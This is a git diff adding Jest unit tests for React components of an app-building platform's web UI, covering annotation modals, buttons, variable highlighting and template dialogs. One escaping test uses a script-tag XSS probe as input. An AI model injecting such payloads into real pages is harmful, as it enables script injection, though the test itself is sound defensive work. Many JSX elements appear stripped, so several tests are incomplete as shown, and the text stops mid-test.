diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx index 91e1e9d8fe..d94295c31c 100644 --- a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx @@ -3,12 +3,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react' import CSVUploader, { type Props } from './csv-uploader' import { ToastContext } from '@/app/components/base/toast' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - describe('CSVUploader', () => { const notify = jest.fn() const updateFile = jest.fn() diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..1f32e55928 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,397 @@ +import { render, screen } from '@testing-library/react' +import 
userEvent from '@testing-library/user-event' +import EditItem, { EditItemType, EditTitle } from './index' + +describe('EditTitle', () => { + it('should render title content correctly', () => { + // Arrange + const props = { title: 'Test Title' } + + // Act + render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + // Should contain edit icon (svg element) + expect(document.querySelector('svg')).toBeInTheDocument() + }) + + it('should apply custom className when provided', () => { + // Arrange + const props = { + title: 'Test Title', + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) +}) + +describe('EditItem', () => { + const defaultProps = { + type: EditItemType.Query, + content: 'Test content', + onSave: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render content correctly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + // Should show item name (query or answer) + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + + it('should render different item types correctly', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Answer, + content: 'Answer content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/answer content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument() + }) + + it('should show edit controls when not readonly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should hide edit controls when readonly', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should respect readonly prop for edit functionality', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + + it('should display provided content', () => { + // Arrange + const props = { + ...defaultProps, + content: 'Custom content for testing', + } + + // Act + render() + + // Assert + expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument() + }) + + it('should render appropriate content based on type', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Query, + content: 'Question content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/question content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should activate edit mode when edit button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await 
user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument() + }) + + it('should save new content when save button is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Type new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Updated content') + }) + + it('should exit edit mode when cancel button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText(/test content/i)).toBeInTheDocument() + }) + + it('should show content preview while typing', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Assert + expect(screen.getByText(/new content/i)).toBeInTheDocument() + }) + + it('should call onSave with correct content when saving', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Test save content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Test save content') + }) + + it('should show delete option when content changes', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and change content + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to trigger content change + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Modified content') + }) + + it('should handle keyboard interactions in edit mode', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + + // Test typing + await user.type(textarea, 'Keyboard test') + + // Assert + 
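+ // Typed text should appear both as the textarea value and in the rendered preview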
expect(textarea).toHaveValue('Keyboard test') + expect(screen.getByText(/keyboard test/i)).toBeInTheDocument() + }) + }) + + // State Management + describe('State Management', () => { + it('should reset newContent when content prop changes', async () => { + // Arrange + const { rerender } = render() + + // Act - Enter edit mode and type something + const user = userEvent.setup() + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New content') + + // Rerender with new content prop + rerender() + + // Assert - Textarea value should be reset due to useEffect + expect(textarea).toHaveValue('') + }) + + it('should preserve edit state across content changes', async () => { + // Arrange + const { rerender } = render() + const user = userEvent.setup() + + // Act - Enter edit mode + await user.click(screen.getByText('common.operation.edit')) + + // Rerender with new content + rerender() + + // Assert - Should still be in edit mode + expect(screen.getByRole('textbox')).toBeInTheDocument() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty content', () => { + // Arrange + const props = { + ...defaultProps, + content: '', + } + + // Act + const { container } = render() + + // Assert - Should render without crashing + // Check that the component renders properly with empty content + expect(container.querySelector('.grow')).toBeInTheDocument() + // Should still show edit button + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longContent = 'A'.repeat(1000) + const props = { + ...defaultProps, + content: longContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(longContent)).toBeInTheDocument() + }) + + it('should handle content with special characters', () => { + // Arrange + const specialContent = 'Content with & < > " \' characters' + const props = { + ...defaultProps, + content: specialContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialContent)).toBeInTheDocument() + }) + + it('should handle rapid edit/cancel operations', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + // Rapid edit/cancel operations + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText('Test content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..a2e2527605 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx @@ -0,0 +1,408 @@ +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast' +import EditAnnotationModal from './index' + +// Mock only external dependencies +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + editAnnotation: jest.fn(), +})) + 
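+// Simulated plan has headroom (5 of 10 annotated responses used), so the quota gate stays open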
+jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 5 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }), +})) + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: () => '2023-12-01 10:30:00', + }), +})) + +// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type ToastNotifyProps = Pick +type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle } +const toastWithNotify = Toast as unknown as ToastWithNotify +const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() }) + +const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as { + addAnnotation: jest.Mock + editAnnotation: jest.Mock +} + +describe('EditAnnotationModal', () => { + const defaultProps = { + isShow: true, + onHide: jest.fn(), + appId: 'test-app-id', + query: 'Test query', + answer: 'Test answer', + onEdited: jest.fn(), + onAdded: jest.fn(), + onRemove: jest.fn(), + } + + afterAll(() => { + toastNotifySpy.mockRestore() + }) + + beforeEach(() => { + jest.clearAllMocks() + mockAddAnnotation.mockResolvedValue({ + id: 'test-id', + account: { name: 'Test User' }, + }) + mockEditAnnotation.mockResolvedValue({}) + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render modal when isShow is true', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Check for modal title as it appears in the mock + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument() + }) + + it('should display query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Look for query and answer content + expect(screen.getByText('Test query')).toBeInTheDocument() + expect(screen.getByText('Test answer')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should handle different query and answer content', () => { + // Arrange + const props = { + ...defaultProps, + query: 'Custom query content', + answer: 'Custom answer content', + } + + // Act + render() + + // Assert - Check content is displayed + expect(screen.getByText('Custom query content')).toBeInTheDocument() + expect(screen.getByText('Custom answer content')).toBeInTheDocument() + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Remove option should be present (using pattern) + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should enable editing for query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Edit links should be visible (using text content) + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(2) + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + + it('should save content when edited', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = 
userEvent.setup() + + // Mock API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'New query content', + answer: 'Test answer', + message_id: undefined, + }) + }) + }) + + // API Calls + describe('API Calls', () => { + it('should call addAnnotation when saving new annotation', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock the API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'Updated query', + answer: 'Test answer', + message_id: undefined, + }) + }) + + it('should call editAnnotation when updating existing annotation', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockEditAnnotation).toHaveBeenCalledWith( + 'test-app-id', + 'test-annotation-id', + { + message_id: 'test-message-id', + question: 'Modified query', + answer: 'Test answer', + }, + ) + }) + }) + + // State Management + describe('State Management', () => { + it('should initialize with closed confirm modal', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Confirm dialog should not be visible initially + expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument() + }) + + it('should show confirm modal when remove is clicked', async () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Assert - Confirmation dialog should appear + expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + }) + + it('should call onRemove when removal is confirmed', async () => { + 
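+      // Removal is a two-step flow: the remove link opens a confirm dialog,
+      // and only the dialog's confirm button is expected to invoke onRemove.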
// Arrange + const mockOnRemove = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + onRemove: mockOnRemove, + } + const user = userEvent.setup() + + // Act + render() + + // Click remove + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Click confirm + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + // Assert + expect(mockOnRemove).toHaveBeenCalled() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty query and answer', () => { + // Arrange + const props = { + ...defaultProps, + query: '', + answer: '', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longQuery = 'Q'.repeat(1000) + const longAnswer = 'A'.repeat(1000) + const props = { + ...defaultProps, + query: longQuery, + answer: longAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(longQuery)).toBeInTheDocument() + expect(screen.getByText(longAnswer)).toBeInTheDocument() + }) + + it('should handle special characters in content', () => { + // Arrange + const specialQuery = 'Query with & < > " \' characters' + const specialAnswer = 'Answer with & < > " \' characters' + const props = { + ...defaultProps, + query: specialQuery, + answer: specialAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialQuery)).toBeInTheDocument() + expect(screen.getByText(specialAnswer)).toBeInTheDocument() + }) + + it('should handle onlyEditResponse prop', () => { + // Arrange + const props = { + ...defaultProps, + onlyEditResponse: true, + } + + // Act + render() + + // Assert - Query should be readonly, answer should be editable + const editLinks = screen.queryAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(1) // Only answer should have edit button + }) + }) +}) diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('RemoveAnnotationConfirmModal', () => { + // Rendering behavior driven by isShow and translations + describe('Rendering', () => { + test('should display the confirm modal when visible', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Remove annotation?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render modal content when hidden', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Remove 
annotation?')).not.toBeInTheDocument()
+    })
+  })
+
+  // User interactions with confirm and cancel buttons
+  describe('Interactions', () => {
+    test('should call onHide when cancel button is clicked', () => {
+      const onHide = jest.fn()
+      const onRemove = jest.fn()
+      // Arrange
+      render(
+        <RemoveAnnotationConfirmModal isShow onHide={onHide} onRemove={onRemove} />,
+      )
+
+      // Act
+      fireEvent.click(screen.getByRole('button', { name: 'Cancel' }))
+
+      // Assert
+      expect(onHide).toHaveBeenCalledTimes(1)
+      expect(onRemove).not.toHaveBeenCalled()
+    })
+
+    test('should call onRemove when confirm button is clicked', () => {
+      const onHide = jest.fn()
+      const onRemove = jest.fn()
+      // Arrange
+      render(
+        <RemoveAnnotationConfirmModal isShow onHide={onHide} onRemove={onRemove} />,
+      )
+
+      // Act
+      fireEvent.click(screen.getByRole('button', { name: 'Confirm' }))
+
+      // Assert
+      expect(onRemove).toHaveBeenCalledTimes(1)
+      expect(onHide).not.toHaveBeenCalled()
+    })
+  })
+})
diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx
new file mode 100644
index 0000000000..615a1769e8
--- /dev/null
+++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx
@@ -0,0 +1,70 @@
+import { fireEvent, render, screen } from '@testing-library/react'
+import OperationBtn from './index'
+
+jest.mock('@remixicon/react', () => ({
+  RiAddLine: (props: { className?: string }) => (
+    <span data-testid="add-icon" className={props.className} />
+  ),
+  RiEditLine: (props: { className?: string }) => (
+    <span data-testid="edit-icon" className={props.className} />
+  ),
+}))
+
+describe('OperationBtn', () => {
+  beforeEach(() => {
+    jest.clearAllMocks()
+  })
+
+  // Rendering icons and translation labels
+  describe('Rendering', () => {
+    it('should render passed custom class when provided', () => {
+      // Arrange
+      const customClass = 'custom-class'
+
+      // Act
+      render(<OperationBtn type="add" onClick={jest.fn()} className={customClass} />)
+
+      // Assert
+      expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass)
+    })
+
+    it('should render add icon when type is add', () => {
+      // Arrange
+      const onClick = jest.fn()
+
// Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) + }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain(' & Special "Chars"', + }, + } + render() + + expect(screen.getByText('App & Special "Chars"')).toBeInTheDocument() + }) + + it('should handle onCreate function throwing error', async () => { + const errorOnCreate = jest.fn(() => { + throw new Error('Create failed') + }) + + // Mock console.error to avoid test output noise + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + let capturedError: unknown + try { + await userEvent.click(button) + } + catch (err) { + capturedError = err + } + expect(errorOnCreate).toHaveBeenCalledTimes(1) + expect(consoleSpy).toHaveBeenCalled() + if (capturedError instanceof Error) + expect(capturedError.message).toContain('Create failed') + + consoleSpy.mockRestore() + }) + }) + + describe('Accessibility', () => { + it('should have proper elements for accessibility', () => { + const { container } = render() + + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + it('should have title 
attribute for app name when truncated', () => { + render() + + const nameElement = screen.getByText('Test Chat App') + expect(nameElement).toHaveAttribute('title', 'Test Chat App') + }) + + it('should have accessible button with proper label', () => { + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + expect(button).toBeEnabled() + expect(button).toHaveTextContent('app.newApp.useTemplate') + }) + }) + + describe('User-Visible Behavior Tests', () => { + it('should show plus icon in create button', () => { + render() + + expect(screen.getByTestId('plus-icon')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-dialog/app-card/index.tsx b/web/app/components/app/create-app-dialog/app-card/index.tsx index 7f7ede0065..a3bf91cb5d 100644 --- a/web/app/components/app/create-app-dialog/app-card/index.tsx +++ b/web/app/components/app/create-app-dialog/app-card/index.tsx @@ -15,6 +15,7 @@ export type AppCardProps = { const AppCard = ({ app, + canCreate, onCreate, }: AppCardProps) => { const { t } = useTranslation() @@ -45,14 +46,16 @@ const AppCard = ({ {app.description}
- ) } diff --git a/web/app/components/app/create-app-dialog/index.spec.tsx b/web/app/components/app/create-app-dialog/index.spec.tsx new file mode 100644 index 0000000000..a64e409b25 --- /dev/null +++ b/web/app/components/app/create-app-dialog/index.spec.tsx @@ -0,0 +1,287 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import CreateAppTemplateDialog from './index' + +// Mock external dependencies (not base components) +jest.mock('./app-list', () => { + return function MockAppList({ + onCreateFromBlank, + onSuccess, + }: { + onCreateFromBlank?: () => void + onSuccess: () => void + }) { + return ( +
+      <div data-testid="app-list">
+        <button type="button" data-testid="app-list-success" onClick={onSuccess}>
+          app-list-success
+        </button>
+        {onCreateFromBlank && (
+          <button type="button" data-testid="create-from-blank" onClick={onCreateFromBlank}>
+            create-from-blank
+          </button>
+        )}
+      </div>
+    )
+  }
+})
+
+jest.mock('ahooks', () => ({
+  useKeyPress: jest.fn((_key: string, _callback: () => void) => {
+    // Default no-op implementation; individual tests override it via mockImplementation
+    return jest.fn()
+  }),
+}))
+
+describe('CreateAppTemplateDialog', () => {
+  const defaultProps = {
+    show: false,
+    onSuccess: jest.fn(),
+    onClose: jest.fn(),
+    onCreateFromBlank: jest.fn(),
+  }
+
+  beforeEach(() => {
+    jest.clearAllMocks()
+  })
+
+  describe('Rendering', () => {
+    it('should not render when show is false', () => {
+      render(<CreateAppTemplateDialog {...defaultProps} />)
+
+      // FullScreenModal should not render any content when open is false
+      expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
+    })
+
+    it('should render modal when show is true', () => {
+      render(<CreateAppTemplateDialog {...defaultProps} show />)
+
+      // FullScreenModal renders with role="dialog"
+      expect(screen.getByRole('dialog')).toBeInTheDocument()
+      expect(screen.getByTestId('app-list')).toBeInTheDocument()
+    })
+
+    it('should render create from blank button when onCreateFromBlank is provided', () => {
+      render(<CreateAppTemplateDialog {...defaultProps} show />)
+
+      expect(screen.getByTestId('create-from-blank')).toBeInTheDocument()
+    })
+
+    it('should not render create from blank button when onCreateFromBlank is not provided', () => {
+      const { onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps
+
+      render(<CreateAppTemplateDialog {...propsWithoutOnCreate} show />)
+
+      expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument()
+    })
+  })
+
+  describe('Props', () => {
+    it('should pass show prop to FullScreenModal', () => {
+      const { rerender } = render(<CreateAppTemplateDialog {...defaultProps} />)
+
+      expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
+
+      rerender(<CreateAppTemplateDialog {...defaultProps} show />)
+      expect(screen.getByRole('dialog')).toBeInTheDocument()
+    })
+
+    it('should pass closable prop to FullScreenModal', () => {
+      // Since FullScreenModal is always rendered with closable=true,
+      // we can verify that the modal renders with the proper structure
+      render(<CreateAppTemplateDialog {...defaultProps} show />)
+
+      // Verify that the modal has the proper dialog structure
+      const dialog = screen.getByRole('dialog')
+      expect(dialog).toBeInTheDocument()
+      expect(dialog).toHaveAttribute('aria-modal', 'true')
+    })
+  })
+
+  describe('User Interactions', () => {
+    it('should render dialog and app list content when open', () => {
+      const mockOnClose = jest.fn()
+      render(<CreateAppTemplateDialog {...defaultProps} show onClose={mockOnClose} />)
+
+      // The modal itself is rendered
+      const dialog = screen.getByRole('dialog')
+      expect(dialog).toBeInTheDocument()
+
+      // The AppList child component renders with its interactive elements
